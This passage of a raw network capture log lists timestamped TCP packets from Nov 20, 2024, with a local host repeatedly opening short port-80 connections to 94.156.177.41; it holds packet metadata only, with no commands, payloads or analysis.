                                                    Nov 20, 2024 11:09:08.137815952 CET4921880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.137865067 CET4921880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.145629883 CET804921894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:08.275965929 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.621579885 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:08.621777058 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.623548985 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.631654978 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:08.631913900 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:08.637043953 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.364536047 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.364584923 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.364690065 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.364878893 CET4921980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.369820118 CET804921994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.492660999 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.500758886 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.500881910 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.502470970 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.510183096 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:09.510262966 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:09.515249968 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.234821081 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.234885931 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.235025883 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.235110998 CET4922080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.241616964 CET804922094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.369602919 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.374630928 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.374739885 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.376441002 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.381447077 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:10.381525993 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:10.386435032 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.115159988 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.115262032 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.115423918 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.115468025 CET4922180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.120984077 CET804922194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.257683992 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.262666941 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.262737989 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.264699936 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.269567013 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:11.269627094 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:11.274554014 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.012393951 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.012469053 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.012535095 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.012558937 CET4922280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.017443895 CET804922294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.143229961 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.148189068 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.148289919 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.149975061 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.154846907 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.154908895 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.159816980 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.941234112 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.941289902 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:12.941472054 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.941580057 CET4922380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:12.950525999 CET804922394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.103667021 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.109251976 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.109457970 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.111741066 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.117993116 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.118072033 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.124625921 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.866027117 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.866194010 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:13.866235018 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.866275072 CET4922480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:13.871526957 CET804922494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.001450062 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.010515928 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.010617971 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.012284040 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.021555901 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.021635056 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.030922890 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.783304930 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.783354044 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:14.783519030 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.783566952 CET4922580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:14.788393021 CET804922594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.006546021 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.011754990 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.011888027 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.048830986 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.054266930 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.054347038 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.065473080 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.785959005 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.785986900 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.786102057 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.786173105 CET4922680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.791291952 CET804922694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.937927008 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.947432995 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.947529078 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.949862003 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.957550049 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:15.957636118 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:15.966806889 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.809887886 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.809973955 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.810036898 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.810108900 CET4922780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.817569017 CET804922794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.957407951 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.965723991 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.965852976 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.968250036 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.974471092 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:16.974548101 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:16.980726004 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.701922894 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.701961994 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.702030897 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.702064991 CET4922880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.709675074 CET804922894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.843311071 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.848350048 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.848448038 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.850151062 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.855776072 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:17.855870008 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:17.860812902 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.526344061 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.526367903 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.526384115 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.526453018 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.526515007 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.526712894 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.526757956 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.527072906 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.527112961 CET4922980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.531305075 CET804922994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.668858051 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.673918962 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.674206972 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.676456928 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.681333065 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:19.681406021 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:19.686351061 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.420433044 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.420458078 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.420636892 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.420974016 CET4923080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.425798893 CET804923094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.558271885 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.564357042 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.564551115 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.566973925 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.573590994 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:20.573694944 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:20.580111027 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.314732075 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.314827919 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.314954996 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.314954996 CET4923180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.322526932 CET804923194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.451595068 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.459656954 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.459768057 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.463058949 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.471091986 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:21.471179962 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:21.476083040 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.217380047 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.217432022 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.217616081 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.217616081 CET4923280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.223851919 CET804923294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.346134901 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.355345964 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.355444908 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.357079029 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.364583969 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:22.364648104 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:22.372081995 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.253979921 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.254051924 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.254069090 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.254108906 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.254139900 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.254162073 CET4923380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.259068012 CET804923394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.395215034 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.402004004 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.402086973 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.403670073 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.410496950 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:23.410558939 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:23.417169094 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.404211044 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.404258966 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.404460907 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.404608011 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.406795979 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.406910896 CET4923480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.409462929 CET804923494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.531588078 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.536748886 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.536880970 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.562783003 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.567739010 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:24.567819118 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:24.572761059 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.308274984 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.308300972 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.308314085 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.308393002 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.308439016 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.308907986 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.308955908 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.433123112 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.573856115 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.574134111 CET4923580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.574563980 CET804923594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.574579954 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.574664116 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.576240063 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.583275080 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:26.583370924 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:26.589478016 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.498418093 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.498486042 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.498516083 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.498635054 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.498635054 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.498635054 CET4923680192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.503715992 CET804923694.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.786453962 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.791443110 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.791518927 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.793325901 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.798197985 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:27.798263073 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:27.803141117 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.601366043 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.601424932 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.601486921 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.601520061 CET4923780192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.606456995 CET804923794.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.856169939 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.863059044 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.863143921 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.865047932 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.872365952 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:28.872432947 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:28.879033089 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.678623915 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.678703070 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.678802013 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.679014921 CET4923880192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.686788082 CET804923894.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.836702108 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.844477892 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.844563961 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.846641064 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.853863001 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:29.853943110 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:29.861638069 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.598742008 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.598767996 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.598870039 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.601013899 CET4923980192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.608398914 CET804923994.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.744384050 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.923508883 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.923743963 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.925380945 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.932981968 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:30.933082104 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:30.940761089 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.681325912 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.681384087 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.681515932 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.683305025 CET4924080192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.688133001 CET804924094.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.816620111 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.821755886 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.821846008 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.823512077 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.828385115 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:31.828471899 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:31.833411932 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.557110071 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.557245970 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.557260990 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.557331085 CET4924180192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.562182903 CET804924194.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.701534986 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.706547976 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.706676006 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.709058046 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.713892937 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:32.713977098 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:32.718877077 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.605262041 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.605325937 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.605446100 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.605518103 CET4924280192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.610429049 CET804924294.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.743163109 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.919831038 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.919929028 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.921736956 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.926830053 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:33.926911116 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:33.931854010 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.675167084 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.675285101 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.675390005 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.675496101 CET4924380192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.681360006 CET804924394.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.815888882 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.821077108 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.821163893 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.822855949 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.827914953 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:34.827985048 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:34.832928896 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.668055058 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.668087959 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.668170929 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.668216944 CET4924480192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.675754070 CET804924494.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.794576883 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.801915884 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.801985025 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.803652048 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.811049938 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:35.811111927 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:35.816056013 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.752933979 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.752959013 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.752971888 CET804924594.156.177.41192.168.2.22
                                                    Nov 20, 2024 11:09:36.753021002 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.753067970 CET4924580192.168.2.2294.156.177.41
                                                    Nov 20, 2024 11:09:36.757976055 CET804924594.156.177.41192.168.2.22
